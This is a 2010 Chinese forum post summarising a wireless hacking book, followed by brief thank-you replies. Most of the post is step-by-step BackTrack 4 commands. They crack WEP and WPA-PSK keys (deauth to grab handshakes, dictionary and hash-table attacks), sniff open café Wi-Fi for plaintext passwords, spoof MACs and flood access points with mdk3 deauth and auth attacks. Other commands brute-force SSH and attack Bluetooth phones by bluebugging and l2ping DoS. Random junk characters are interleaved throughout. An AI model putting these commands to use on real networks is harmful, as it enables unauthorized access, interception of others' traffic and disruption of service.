查看: 10518|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3719

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
TG-NET
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。# _- V! e' }# s# W" p& E

7 C, s: z2 z. ?9 ?5 T& b以下所有操作均在BackTrack 4中进行。
$ {7 D' k% o) ^, y% l( I5 [% @
/ a' ~* x8 D9 C3 B6 [' c! d1 ]7 R
5 t& D. I  g& }+ x, J无线WEP加密P解:
& {* X: C+ c3 D6 B. X% h8 ]* `8 K
注入P解:
) e6 C# k1 ?( T
/ Y, O% Y9 t2 m7 B% j- A  c: jifconfig3 ]* z" H& b4 e
% H* ~1 l! S) {
ifconfig –a
8 }9 P8 I/ }3 X. u/ p# K$ X3 a  v. `6 Z8 ^8 ^8 y/ D
ifconfig wlan0(无线网卡) up5 G$ j9 _1 U/ H( w8 r
! L2 |) p0 F5 ]: o7 j& y
airmon-ng start wlan0
" h! p' o7 m2 T  X) ]% I9 t6 c- G5 M+ J' I
airodump-ng mon0
4 O+ K* q4 A; ^* c2 I
/ x, s3 P& O$ E; f5 lairodump-ng --ivs –w ivsfile –c 频道 mon0或) }+ z! M1 |3 A1 D; O) J
; W. i: l8 h& T# D
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0. {" x  C. ~0 z% _! X
+ ]% F' A) S+ |/ F
aireplay-ng -3 –b BSSID –h Station mon0$ I& L1 V% |" p# _* I

8 T7 M4 R. `) b2 r1 h: caircrack-ng ivsfile-01.ivs6 x. }+ x; A. D8 T7 B
: Y1 L/ C% z6 V. |6 N! b9 d  L
虚连接P解(适用于无客户端连接APP解)( A: F+ _- m- `3 A+ }1 N! |' i
# ~! l) s6 `7 z7 c! N+ R& L
ifconfig, \6 L: ~/ u. q/ E

2 |/ ^! K% I7 G4 Rifconfig –a& N7 O% G8 b& q; E9 c5 X
* X5 r3 R/ F3 A; ]
ifconfig wlan0(无线网卡) up
8 a7 t7 A/ S7 h. W+ k& c. S& A: N, D
airmon-ng start wlan0
. j+ _  @: J+ C- P# k: h# v, }6 c: y( t- h0 P( W: r- V
airodump-ng mon0
* V! L0 H% W9 ~: r8 n2 s+ O* F3 J5 E' F. y  V
airodump-ng --ivs –w ivsfile –c 频道 mon0或! I# |, F4 o" i" k  C) P

) v& y0 i( q" Y7 y. Lairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
" _0 W. O$ b3 ]' m+ O6 r5 N( X+ y! |' Q+ J1 c2 j) ^
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon04 ^9 D  b; [0 [+ n) W* A
% o) \/ o1 h' @
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0# p4 w- g3 D0 W
4 r# s7 q2 w9 o9 G) w! L
aircrack-ng ivsfile-01.ivs
  q; d5 j  V" i% w
! f3 l2 n6 j4 U" Q! S0 L7 W/ K& y  q* z
# y! ~" u, ~% _) m  z4 D还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。% U8 s" i5 f5 V

4 ?- W3 ~( [% v% v$ T# a+ P, b4 \0 F8 x: k9 c0 T
WPA-PSKP解
/ D( K9 m( B# u$ c1 Q" Z* t4 V1 \4 ]4 N& b3 [
ifconfig
2 f0 ?8 i& Z% y- g5 e) |8 f
, h: y. ?* Y8 D$ T$ {: |! R7 [ifconfig –a
  F* |- I2 m" m2 w6 I7 M% a; N# Z: E8 F9 T, O8 {' y
ifconfig wlan0(无线网卡) up
8 ^# f2 {3 ]: p! \% O% Z% n0 u, c9 p- {! h( g
airmon-ng start wlan0' {7 ^$ U$ G" D* }7 `4 W9 @
& l- M5 ]5 B. p+ C% ]$ [0 ]$ Y
airodump-ng mon0, v2 j6 U  ~  o0 K6 L
& j4 e! K. I  i+ O7 y  ~5 @  s
airodump-ng –w capfile –c 频道 mon0/ z: H% c/ Z% C* a4 z  v
6 O' Y! W- C5 S  L; {
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
  l" y- F8 ]7 x6 j* J1 I# x  {/ d- f
aircrack-ng –w Dic capfile-01.cap或
0 t; U% G3 M9 b; d+ Z' N$ b+ M$ j& C. R: `( n; x
cowpatty –f Dic –r capfile-01.cap –s SSID
+ d" v: l. j7 R0 S& J& k1 o$ M0 t
& Y. p, g# A& C3 |& C! Hcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
$ Y/ E  ]+ R: c2 `4 Q
+ B0 f% i) N) `, r4 y3 z8 O6 H傻瓜式P解软件SpoonWPA。
, h) G) ]. A" Q9 H
+ m( U$ I2 T  Y6 h0 i* FBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
! E; z8 D% O1 F! i: u3 {$ S4 h* B, {( I- F' U

9 {) H' S$ B" r6 O5 @+ h) |% R字典文件的生成和上传6 V2 f" O) i, X1 L- V
! ?% q9 ]" p4 c( q1 c
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。* R; U& T& u3 l0 q' [

1 `# O; Q+ r8 B( |! F+ q
* }  U- r) U2 `; n* aBT4下开启Tftp:Services—TFTPD—start TFTPD
. ]5 U7 Q) F; |9 y
# n: X' v8 @6 X) ?) \2 r5 k" h在Windows的CMD中运行 tftp –i IP put **.dic
; i- E6 S$ i* m5 f* `4 b  a# G6 Z* E8 {; k
! |8 C0 l' s, k% }3 o3 s, j
BT4下开启SSH:Services—SSH—start SSH0 r4 z; z; O/ Y% x- g# V! G

  M' R' n* M' c9 `: SWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root4 }. T$ r3 b0 l, A+ q1 H! k- @& J
+ F, R/ N7 j9 p8 Y7 n

0 M1 M) g" T0 R: ]' GAP限制MAC时的解决5 j& _# d4 k. l3 P5 O9 l. L

+ R7 ?8 Q7 q5 K5 T7 h0 v当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
3 Z! Z' N& r. ], |* s4 ~5 [+ z6 B% y/ w/ j3 E# m
ifconfig wlan0 hw ether NewMAC
$ ?3 _7 U! f' d1 \9 M
* X% v- x  d1 R7 u& \) K
' M7 N* R( j* v8 C& C; i; `关闭SSID广播的AP探测:% x" h4 [- p9 A
! c/ V$ S& h$ b0 ?$ D: l6 x
1.     Deauth攻击:
; w6 e( p$ J# T/ G* v' z6 t* o" @( c9 x, }/ N/ h" ]
airodump-ng mon0  Y' O! u: d, O7 Q& m' ]% @

) D- C9 s3 {0 B( w. z, h1 O( ]9 gaireplay-ng -0 10 –a BSSID –h Station mon0
6 o3 m$ z, {1 H" y# G2 \2 @; S) c3 r. i1 F
2.     抓包分析
& b" v& v9 \+ l
; w# ~7 f1 y$ R: Q8 W. wOmnipeek
1 Y; E7 C' B" ~  C# w/ y' F2 z! Q" J" b* X
Tcpdump –n –e –vvv –i 网卡名5 V( Y# y% U  @* R, `4 O+ t
9 M' Q, `9 Y9 h5 q
3.     暴力P解* P3 l' i& X9 p

7 U1 x& z0 K' b5 D7 Q6 DCharon 1.1暴力P解
" o$ \1 M; e+ W: g. x
" H4 D& ]4 ]/ a2 V7 ?' o; U# ~1 h! T9 Y2 l4 ^; k
无线加密数据包的解密
  ^5 b2 y6 [' K3 n% S" v: {% \9 R$ f

! r: _9 ]5 n( d$ r1 l/ _$ T6 R! i) s使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
0 P5 y9 T# k; \" r5 C0 L6 M- g2 R) ~
' o0 N7 Y8 ~1 y: r7 j: ]FilterNS     DNS解析数据包
# D% j. h- K/ r0 Z- c0 m
& z; T3 V1 K; N# ^8 \Filter:HTTP    WEB访问数据包
) i0 G1 e/ b7 G4 e7 K- P% S" r. R( m4 w" K3 A: N8 N
Filter:msnms   MSN. `) t/ F: U8 ]: r  i' b5 l# a# B
) `5 u: C. h3 [0 J) X- g+ X
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。& _2 u" L8 n" @* l
) ?# f% r# e. K8 Z. o% E
使用airdecap-ng解密:
9 G% ]0 n! K# c
. C! @% ]  V! ?& RAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap8 I" r3 A. x- j% W9 S
, j3 T% ^  y( `5 ~  ~# p

  a7 a  T$ `( o* j: w咖啡馆中无线数据截取(开放式无加密AP)1 N. y3 G& F7 n: T- m* V
  @: R# w+ ]: b6 ?* [
1.Airodump-ng –w data –c频道 mon0& D8 L) k  C6 g: v
' ^+ w9 r5 C5 k5 I0 k5 w
2.使用WireShark打开分析
) k' U6 T' h* C7 J4 B% O5 {4 u1 U
$ p% i# ]: I( O8 L+ q4 u6 @4 L. z3 n0 I- \6 l: O% H7 D
BT4下的渗透工具:
# j! P' x6 G5 h  z1 m/ W6 a2 O
9 V' m3 m. v4 Q* Snmap –sP IP/24        判断C段下存活的主机 , L+ |2 r6 Z4 ^" z4 W. z, e/ J

: l' P5 ]6 q9 a+ Z; B' I2 n2 Onmap –vv –sS IP/24 –p Port    扫描指定端口是否开放) p# r1 P8 a, A* B  p+ t2 c$ K: ?$ [

: u! Z7 @+ p. m2 o2 C2 v6 bnmap –vv –sV IP –p port   指定端口的详细信息。。。
! |' w/ N2 v, E! N. j1 S7 e, k; S. r: ~6 j. W
namp –O IP/24    判断主机的系统版本
( e- z0 R* |4 c8 L3 a' v' _# ~( `. t! m- M* E) N" b
5 a9 E/ u  W* d( G
GUI 版nmap:Zenmap
3 s* z6 \2 o& ]4 G
* u0 J/ w4 F' c% t5 I' Z
* r5 t0 b6 ^" i. S/ n; K6 [0 oAmap使用:amap –B IP port& ]. O, w3 f3 x$ `: N
" I/ S7 O( ]; x# F+ \
Nbtscan(扫描Windows网络NetBios信息):9 Y- R1 t7 F0 C% k; E# }* R

  T. A/ o* F3 z5 h- O' unbtscan –v –s : IP/24
/ d8 S# i5 v( J: {/ H4 V1 \0 @, u/ c- q  k* a9 ]2 b
nbtscan –r IP
% o. O* @) p3 z
; U) b, a4 x: F$ P$ x$ A- n0 d
. L+ c( S" H8 q" B$ ODNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
2 ]1 n2 s0 M3 t: ]! m, K. [2 l- M0 h
! ?; p$ I. C& _. W. X6 I$ |
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
' v  w, R6 K2 ~' j# G( F( m- [: P
7 P4 i- g0 Q: e( ?* dBruteSSH: ./bruthe.py –h IP –u Username –d Dic
2 ]7 C. M1 C* @1 C- l; O! X- h( Q* B- x) J
Metasploit3使用
% |4 C$ ]) i7 Q$ O) O$ l8 y" X无线D.0.S
4 f; g+ o' E# a
7 k: Y# H/ e3 x1 `6 X3 J: K! d; H
; ?1 V8 k  H. `4 {- MAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
0 y" S1 C* x/ d
2 h# @2 I: ]+ z  Fairmon-ng start wlan0
. ]# y# l# M) q5 }; n4 n+ n8 `5 l- e  h2 j! @, v. Y
airodump-ng mon0& m2 B! m! c2 E4 c* o9 x- j: ~
4 S0 }# w$ v, V0 J" k; D
mdk3 mon0 a –a BSSID
: v6 d4 H4 \8 \4 U/ z6 z. k
1 o+ c4 q# c8 z对所有的AP攻击:mdk3 mon0 a
+ F) ^% w$ X" u1 b) T4 S
0 j  ^) O) X2 B' z; Y4 d
) W2 h2 v3 _* ]' ^# K8 R# uDeauth Flood 攻击( b. u1 Y7 W" K' ^  Z! v9 S/ n8 \$ |
0 A+ }6 j7 h) k6 W
mdk3 mon0 d –c Channel
# e8 Q/ G6 w" P7 _6 z4 M' L+ C  n' @. y( j/ l6 U0 b$ P* n7 x" a
图形化D.O.S攻击:Charon0 @' {: y2 z: ~) X+ j' g

% K2 o) E! o2 _7 g8 K5 f; F+ c" h9 U$ p4 N1 R* t6 n- n$ m+ _2 I. x
当受到攻击时,使用Wireshark抓包可以看到异常信息。+ X' ~) a9 R' }* w
; t3 V- O6 T2 w8 K4 |

! B. j& _% F* D& B! T( G% T' q# iWPA-PSK高速P解
5 O- c$ q, }5 R8 S: w, D1 S( L* P8 D& p; k3 s
1.       WPA-PSK PMK Hash TablesP解. e- }) Q5 p  F% m% y( W; D" G

4 P2 [! v# n+ ?3 ^- lCowpatty –d HashTable.hash –r ***.cap –s SSID! O6 m" g# e, V. H

: q; L* ^3 d. E1 m7 UHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
( H1 c# v# M& e8 O& @% J- g* P& l# z0 Q
2.       GPU辅助高速P解
+ S0 [4 l4 t4 m: \
, _1 {- C1 _, d5 o2 q2 K使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
6 I, X6 G: Y( j" u% c) i4 p
# d' y8 ^2 N! F) n7 h3.       分布式P解6 U. Q6 e8 w$ v

, X) A! f( n3 H. L
. C5 i0 O& Y4 K2 `$ \AP的伪造) \/ x0 Q/ D! ]  u

  N3 u. }/ K: b% `2 E( i把AP的MAC改成目标AP的MAC3 r2 d0 ~0 Z  I

! b2 i( T2 ~2 H网卡软AP
0 D( [2 Z; ?4 S+ [& O' Q5 U# J& Q) X8 u# w6 i& R/ h" Y' z( x

' C" C* N! h: D伪造大量虚假AP信号:/ ?! n) Q! g2 I  \

/ i: T  O' P2 y$ ?4 u  J  m随机SSID:mdk3 mon0 b –g –c 频道
8 U, k3 v4 u7 \) `3 ^: A
2 @# m9 ?5 M( m: \) x  [指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度9 `6 B  Q7 p6 F1 p5 d/ B
+ T% a# k# [) X/ f+ s
0 `5 J5 b; l/ j0 q4 [, a
War-Driving+ R1 F4 D, Y5 o
( u) b6 [4 L1 v  E7 e
热点地图绘制* Y: u0 P, E# Y4 K" O
/ ^9 ?" @0 G$ p/ y+ H: L1 I$ s) v
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
% p6 |/ Q! E5 W9 z+ c6 |/ L+ Y8 c3 R6 K

# }% {4 x6 E3 N* Z0 _: C6 \Netstumble
' N0 V$ P, H4 w% a7 V( M
' U( O; r5 e0 I7 O& @; ]$ h% r6 u& ]" P
蓝牙Hacking
1 h/ I( ]7 g! f; x- R& P: l% J: Y) r( R( L$ Y/ h2 @7 Q
Windows下的Blue Soleil工具
5 Z5 K  h, `) ]
5 E  C  r' Z" U4 y. m" Y: V' F/ n" BBT4:! Y3 D  B& q/ g7 ~
+ n) M# J" w! F4 I; H$ P
hciconfig 查看蓝牙适配器
8 m0 ?& X/ i- R& Q
; R9 S7 ?# {5 B+ `4 n, Bhciconfig hci0 up 载入蓝牙适配器
$ R, N7 R, o9 \7 }2 a  u4 O8 _- p3 z& ~. R" @, q4 w+ W4 E
hciconfig hci0 class 蓝牙适配器详细信息* Q2 X. N. {) t+ ^- Z

1 g6 I3 A: I- P, {4 g
7 l- s/ q! S0 D( Jhcitool(扫描蓝牙)
6 x3 a. p+ V; W/ g. m+ J  K8 x
2 S. t1 t% G; x9 J1 B* l3 ]4 [! {hcitool –i hci0 scan
, x  T* V9 Z- J+ k# \  s
0 Y9 J# H5 D1 w$ C7 wBTscanner(扫描蓝牙)+ p, V6 w+ j' J& M$ B! ~0 T% _

& t" D# t+ e0 R5 I  s; P/ i/ h
; a- ]3 K3 j! z  s/ [- j蓝牙攻击:% v) a* h. r& K- X9 q. q1 q4 l

+ u+ p9 C4 t. u  o  u8 p4 ~BlueBugging (适用于BlueTooth V1.1的手机)
1 \/ t9 F3 ]. f) h
2 C2 S$ O* c, Z0 o$ U& cBluebugger工具:
2 i0 R4 j( Y, |4 I2 Z! k* R* ?. ~# U  D$ b" V7 Y0 N
Bulebugger –a HD_Addr info6 r: F2 f6 u4 P

8 `2 Y8 Z) I& n9 m1 s; p
9 L# u8 ^5 E8 X0 A$ OBlueJacking
$ }; ^7 s" L* J' o/ D+ Y* {" N( x: a  Y% A
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。& Z: b3 p5 f9 \8 a; j1 |, h% U7 H
+ f5 a$ `6 I1 w$ n7 ]
7 X: C( V  ]" c. p2 B
HD_Addr修改:' c6 T+ j5 |9 d- W. o

  p# l8 [, p3 c/ Y' UBdaddr工具
/ G4 r; ?5 p8 {1 {; X- K* k) n# C0 Y. n; D
bdaddr –i 蓝牙设备名 新HD_addr3 n8 |0 Z4 h+ E! A+ Z1 ~; u8 y! c5 Q

' b7 R  \4 a% `) a0 N4 {; V/ |8 l* d* k) B1 }" N# a, n
蓝牙D.O.S9 }6 g, U# O" {; V! w: U4 {! M
% h1 ?- U" ^6 e0 f* c, D- I3 N; \5 G
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务  U! Z9 c+ ?. r( h2 h, J

, r& m* J' T/ j# I3 t' o" [& ehciconfig$ g5 J! v6 e& u  t

" ]: g  k2 ^8 n% H; ~hciconfig hci0 up
" {( }, Y6 k" Q  i2 m/ f" i( O) A/ J7 M
hcitool –i hci0 scan
3 l  n' R+ Z4 {1 y
# L0 U' ~: o2 h' P7 L. Z/ ml2ping –s 10000 –目标MAC
. m4 g! x0 L+ H
, V7 F" S3 O9 q9 H; P  n2 z& P" C
/ i$ l$ w# o6 _$ C% {: J$ U  U不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
5 R* Y  G/ G4 X9 E
' J% T. S4 x9 ~./fang –r ************-############ -s
# a" _0 W- K' k! p1 Z2 w( U
! b: f6 @+ R$ q- K# ?2 G" }& W$ \! K暴力P解************-############的蓝牙设备8 v+ [- m' o4 s" ^- z: {3 G

$ f4 g9 k  V* T) R+ O# V" X, \./fang –l 各厂商BD_Addr分配* L- T% Z8 T* J& d

9 T" z& t9 V0 V; r% c
3 V6 ^4 d: U5 c! u/ _WifiZoo使用
- R& x* j) q9 E% r( W2 Z0 \$ L6 q/ W3 |1 s) X- C: y
./wifizoo.py –c Capfile- j0 o: J1 a5 k
6 p9 G' h3 \: P
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

140

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

907

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。, m. d5 `' P! ~2 D; E7 K
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的4 Y, e, T1 P; I7 k
呵呵 其实也不贵 21块 快递再一点
9 D7 ^/ I7 ?* ?7 e# U4 O" x4 H我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

关闭

站长推荐 上一条 /1 下一条

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2016-7-27 13:41

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表